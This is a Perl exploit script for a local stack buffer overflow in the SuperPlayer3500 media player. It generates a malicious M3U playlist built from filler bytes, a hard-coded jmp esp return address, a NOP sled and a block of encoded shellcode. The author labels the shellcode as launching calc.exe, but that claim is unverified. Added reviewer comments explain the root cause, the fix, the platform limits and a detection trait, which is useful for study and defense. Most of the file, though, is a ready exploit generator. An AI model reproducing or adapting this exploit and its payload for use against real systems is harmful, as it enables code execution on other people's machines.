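#!/usr/bin/perl
# SuperPlayer3500 Local stack based buffer overflow
# Author: jun
# Email: haojunhou@gmail.com
# Date: Tue Jul 22 2013
# Vendor Link: http://www.haojie.cn
# Software Link: http://www.haojie.cn/download/setup_3500.exe
# App Version: 3500
# Tested on: windows xp sp3
#
# Proof of concept: writes a one-line .M3U playlist whose single entry is
# longer than the stack buffer the player uses for it. The line is laid out
# as: 348 filler bytes, a 4-byte little-endian value, 20 bytes of 0x90, the
# payload, then CRLF.
#
# Reviewer notes:
#   * The 348-byte offset and the user32.dll address are the author's values
#     for the test platform listed above. A hard-coded module address only
#     holds where that exact DLL build loads at the same base, so it does not
#     carry over to systems with ASLR or a different user32.dll.
#   * Running code from the stack presumably also requires that DEP is not
#     enforced for the player process -- not stated by the author.
#   * The root cause is an unchecked copy of a playlist entry into a
#     fixed-size stack buffer; the fix belongs in the parser (length check
#     before the copy), with /GS, DEP and ASLR as build-level hardening.
#   * Detection trait of the generated file: a playlist entry several hundred
#     bytes long that contains non-printable bytes and no path or URL.

use strict;
use warnings;

# Name of the playlist file written to the current directory.
my $file = "superplay3500exp.M3U";

# Filler up to the saved return address (offset as reported by the author).
my $junk = "A" x 348;

# 'V' packs a 32-bit unsigned integer in little-endian byte order.
my $eip = pack('V', 0x77d29353); # jmp esp on user32.dll (per the author)

# 20 bytes of 0x90 (x86 NOP) placed between the address and the payload.
my $nops = "\x90" x 20;

# Payload bytes, labelled "exec calc.exe" by the author; not verified here.
# The trailing "\r\n" terminates the playlist line.
my $shellcode =
"\x33\xc9\xb8\xd1\xa3\x3d\x27\xda\xdf\xd9\x74\x24\xf4\xb1" .
"\x32\x5a\x83\xc2\x04\x31\x42\x0c\x03\x93\xaf\xdf\xd2\xef" .
"\x58\x96\x1d\x0f\x99\xc9\x94\xea\xa8\xdb\xc3\x7f\x98\xeb" .
"\x80\x2d\x11\x87\xc5\xc5\xa2\xe5\xc1\xea\x03\x43\x34\xc5" .
"\x94\x65\xf8\x89\x57\xe7\x84\xd3\x8b\xc7\xb5\x1c\xde\x06" .
"\xf1\x40\x11\x5a\xaa\x0f\x80\x4b\xdf\x4d\x19\x6d\x0f\xda" .
"\x21\x15\x2a\x1c\xd5\xaf\x35\x4c\x46\xbb\x7e\x74\xec\xe3" .
"\x5e\x85\x21\xf0\xa3\xcc\x4e\xc3\x50\xcf\x86\x1d\x98\xfe" .
"\xe6\xf2\xa7\xcf\xea\x0b\xef\xf7\x14\x7e\x1b\x04\xa8\x79" .
"\xd8\x77\x76\x0f\xfd\xdf\xfd\xb7\x25\xde\xd2\x2e\xad\xec" .
"\x9f\x25\xe9\xf0\x1e\xe9\x81\x0c\xaa\x0c\x46\x85\xe8\x2a" .
"\x42\xce\xab\x53\xd3\xaa\x1a\x6b\x03\x12\xc2\xc9\x4f\xb0" .
"\x17\x6b\x12\xde\xe6\xf9\x28\xa7\xe9\x01\x33\x87\x81\x30" .
"\xb8\x48\xd5\xcc\x6b\x2d\x27\x3c\xa6\xbb\xb0\xe7\x53\x86" .
"\xdc\x17\x8e\xc4\xd8\x9b\x3b\xb4\x1e\x83\x49\xb1\x5b\x03" .
"\xa1\xcb\xf4\xe6\xc5\x78\xf4\x22\xa6\x1f\x66\xae\x29"."\r\n";

# Three-argument open with a lexical handle: the mode can no longer be
# altered through the file name, and a failed open is reported instead of
# being ignored and followed by a print to an unopened handle.
open(my $out, '>', $file)
    or die "Cannot open $file for writing: $!\n";

print {$out} $junk . $eip . $nops . $shellcode
    or die "Cannot write to $file: $!\n";

# Buffered write errors only surface at close, so check it as well.
close($out)
    or die "Cannot close $file: $!\n";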